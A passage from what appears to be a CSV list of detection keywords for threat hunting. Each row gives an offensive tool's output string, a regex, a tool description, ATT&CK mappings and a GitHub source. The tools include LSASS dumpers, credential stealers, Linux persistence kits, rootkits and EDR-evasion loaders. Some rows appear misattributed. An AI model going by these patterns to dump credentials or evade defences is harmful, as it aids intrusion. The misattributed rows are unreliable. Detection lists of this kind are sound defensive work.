LD_PRELOAD has been added!*",".{0,1000}\[\+\]\sSuccess!\sLD_PRELOAD\shas\sbeen\sadded!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13334" "*[+] Successful allocated remote memory: lpRemoteLibraryBuffer:[*",".{0,1000}\[\+\]\sSuccessful\sallocated\sremote\smemory\:\slpRemoteLibraryBuffer\:\[.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13335" "*[+] Successful change protection: RW -> RX*",".{0,1000}\[\+\]\sSuccessful\schange\sprotection\:\sRW\s\-\>\sRX.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13336" "*[+] Successful copied dll buffer*",".{0,1000}\[\+\]\sSuccessful\scopied\sdll\sbuffer.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13337" "*[+] Successful injected DLL: hThread:*",".{0,1000}\[\+\]\sSuccessful\sinjected\sDLL\:\shThread\:.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13338" "*[+] successfully breached the mainframe as real-PID *",".{0,1000}\[\+\]\ssuccessfully\sbreached\sthe\smainframe\sas\sreal\-PID\s.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","13339" "*[+] Successfully decrypted minidump file*",".{0,1000}\[\+\]\sSuccessfully\sdecrypted\sminidump\sfile.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","0","#content","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","13340" "*[+] Successfully decrypted NGC key set from protector type *",".{0,1000}\[\+\]\sSuccessfully\sdecrypted\sNGC\skey\sset\sfrom\sprotector\stype\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. 
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#content","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","13341" "*[+] Successfully downloaded GPO from fakedc to *",".{0,1000}\[\+\]\sSuccessfully\sdownloaded\sGPO\sfrom\sfakedc\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#content","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13342" "*[+] Successfully downloaded legitimate GPO from SYSVOL to *",".{0,1000}\[\+\]\sSuccessfully\sdownloaded\slegitimate\sGPO\sfrom\sSYSVOL\sto\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","#content","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","13343" "*[+] Successfully injected into process *",".{0,1000}\[\+\]\sSuccessfully\sinjected\sinto\sprocess\s.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","0","#content","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","13344" "*[+] Successfully injected malicious scheduled task*",".{0,1000}\[\+\]\sSuccessfully\sinjected\smalicious\sscheduled\stask.{0,1000}","offensive_tool_keyword","GPOddity","GPO 
attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","#content","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","13345" "*[+] Successfully injected malicious scheduled task*",".{0,1000}\[\+\]\sSuccessfully\sinjected\smalicious\sscheduled\stask.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#content","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13346" "*[+] Successfully opened {LSASS} handle*",".{0,1000}\[\+\]\sSuccessfully\sopened\s\{LSASS\}\shandle.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","#content","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","13347" "*[+] Successfully opened LSASS, PID: *",".{0,1000}\[\+\]\sSuccessfully\sopened\sLSASS,\sPID\:\s.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#content","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","13348" "*[+] Successfully retrieved an access token for User:*",".{0,1000}\[\+\]\sSuccessfully\sretrieved\san\saccess\stoken\sfor\sUser\:.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - 
TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","13349" "*[+] successfully self destructed server*",".{0,1000}\[\+\]\ssuccessfully\sself\sdestructed\sserver.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","#content","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","13350" "*[+] Successfully set the spool directory to: *",".{0,1000}\[\+\]\sSuccessfully\sset\sthe\sspool\sdirectory\sto\:\s.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#content","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","13351" "*[+] Successfully spoofed GPC gPCFileSysPath attribute*",".{0,1000}\[\+\]\sSuccessfully\sspoofed\sGPC\sgPCFileSysPath\sattribute.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","#content","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","13352" "*[+] Successfully spoofed gPLink for OU *",".{0,1000}\[\+\]\sSuccessfully\sspoofed\sgPLink\sfor\sOU\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - 
TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#content","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13353" "*[+] Successfully updated extension names of fakedc GPO*",".{0,1000}\[\+\]\sSuccessfully\supdated\sextension\snames\sof\sfakedc\sGPO.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#content","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13354" "*[+] Successfully uploaded GPO to SMB server *",".{0,1000}\[\+\]\sSuccessfully\suploaded\sGPO\sto\sSMB\sserver\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#content","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13355" "*[+] Sucessfully Dumped Process!*",".{0,1000}\[\+\]\sSucessfully\sDumped\sProcess!.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","#content","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","13356" "*[+] Sucessfully injected the shellcode into *",".{0,1000}\[\+\]\sSucessfully\sinjected\sthe\sshellcode\sinto\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13357" "*[+] Suitable Handle to LSASS Found from PID: *",".{0,1000}\[\+\]\sSuitable\sHandle\sto\sLSASS\sFound\sfrom\sPID\:\s.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","#content","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","13358" "*[+] SYSKEY restrieving*",".{0,1000}\[\+\]\sSYSKEY\srestrieving.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","#content","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","13359" "*[+] SYSKEY restrieving*",".{0,1000}\[\+\]\sSYSKEY\srestrieving.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#content","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","13360" "*[+] Systemd Generator persistence established!*",".{0,1000}\[\+\]\sSystemd\sGenerator\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content 
#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13361" "*[+] SysWhispers is not compatible with Obfuscator-LLVM; switching to GetSyscallStub*",".{0,1000}\[\+\]\sSysWhispers\sis\snot\scompatible\swith\sObfuscator\-LLVM\;\sswitching\sto\sGetSyscallStub.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13362" "*[+] SysWhispers is not compatible with Obfuscator-LLVM; switching to GetSyscallStub*",".{0,1000}\[\+\]\sSysWhispers\sis\snot\scompatible\swith\sObfuscator\-LLVM\;\sswitching\sto\sGetSyscallStub.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13363" "*[+] task has been created successfully ..!*",".{0,1000}\[\+\]\stask\shas\sbeen\screated\ssuccessfully\s\s\.\.!.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","#content","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","13364" "*[+] The 
1$a$$.exe*",".{0,1000}\[\+\]\sThe\s1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","#content","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","13365" "*[+] the Arbitrium-Server is running*",".{0,1000}\[\+\]\sthe\sArbitrium\-Server\sis\srunning.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#content","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","13366" "*[+] The DLL has been injected into ngentask.exe via DLL Side-Loading*",".{0,1000}\[\+\]\sThe\sDLL\shas\sbeen\sinjected\sinto\sngentask\.exe\svia\sDLL\sSide\-Loading.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","#content","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","13367" "*[+] The encrypted payload with *",".{0,1000}\[\+\]\sThe\sencrypted\spayload\swith\s.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - 
TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","#content","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","13368" "*[+] The scheduled task is hidden and invisible now*",".{0,1000}\[\+\]\sThe\sscheduled\stask\sis\shidden\sand\sinvisible\snow.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#content","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","13369" "*[+] This application is injectable!*",".{0,1000}\[\+\]\sThis\sapplication\sis\sinjectable!.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","#content","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","13370" "*[+] Thread hijacking successful*",".{0,1000}\[\+\]\sThread\shijacking\ssuccessful.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13371" "*[+] Thread hijacking successful*",".{0,1000}\[\+\]\sThread\shijacking\ssuccessful.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13372" "*[+] Token-Impersonation Loaded*",".{0,1000}\[\+\]\sToken\-Impersonation\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13373" "*[+] Triggering name pipe access on evil PIPE *",".{0,1000}\[\+\]\sTriggering\sname\spipe\saccess\son\sevil\sPIPE\s.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/CCob/SweetPotato","1","0","#content","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","13374" "*[+] Triggering name pipe access on evil PIPE*",".{0,1000}\[\+\]\sTriggering\sname\spipe\saccess\son\sevil\sPIPE.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13375" "*[+] Triggering name pipe access on evil PIPE*",".{0,1000}\[\+\]\sTriggering\sname\spipe\saccess\son\sevil\sPIPE.{0,1000}","offensive_tool_keyword","SharpEfsPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13376" "*[+] Unhooking the NTDLL for Process with PID *",".{0,1000}\[\+\]\sUnhooking\sthe\sNTDLL\sfor\sProcess\swith\sPID\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13377" "*[+] Unhooking the NTDLL from PID * completed successfully.*",".{0,1000}\[\+\]\sUnhooking\sthe\sNTDLL\sfrom\sPID\s.{0,1000}\scompleted\ssuccessfully\..{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13378" "*[+] Updated Elevated HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon key UserInit*",".{0,1000}\[\+\]\sUpdated\sElevated\sHKLM\:Software\\\\Microsoft\\\\Windows\sNT\\\\CurrentVersion\\\\Winlogon\skey\sUserInit.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#content","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","13379" "*[+] Uploading to PS2exe and generating payload*",".{0,1000}\[\+\]\sUploading\sto\sPS2exe\sand\sgenerating\spayload.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#content","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","13380" "*[+] UPXed successfully*",".{0,1000}\[\+\]\sUPXed\ssuccessfully.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#content","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","13381" "*[+] USAGE: DirtyVanity *",".{0,1000}\[\+\]\sUSAGE\:\sDirtyVanity\s.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#content","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","13382" "*[+] Use -info to get stack status and the enpoint url of catspin*",".{0,1000}\[\+\]\sUse\s\-info\sto\sget\sstack\sstatus\sand\sthe\senpoint\surl\sof\scatspin.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. 
It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#content","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","13383" "*[+] User * added to /etc/passwd with root privileges.*",".{0,1000}\[\+\]\sUser\s.{0,1000}\sadded\sto\s\/etc\/passwd\swith\sroot\sprivileges\..{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13385" "*[+] User * has been modified to have UID 0 (root privileges).*",".{0,1000}\[\+\]\sUser\s.{0,1000}\shas\sbeen\smodified\sto\shave\sUID\s0\s\(root\sprivileges\)\..{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13386" "*[+] User hash stolen!*",".{0,1000}\[\+\]\sUser\shash\sstolen!.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","13387" "*[+] User persistence through the new * user 
established!*",".{0,1000}\[\+\]\sUser\spersistence\sthrough\sthe\snew\s.{0,1000}\suser\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13388" "*[+] Using DLL enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sDLL\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13389" "*[+] Using DLL enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sDLL\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13390" "*[+] Using DLL enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sDLL\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - 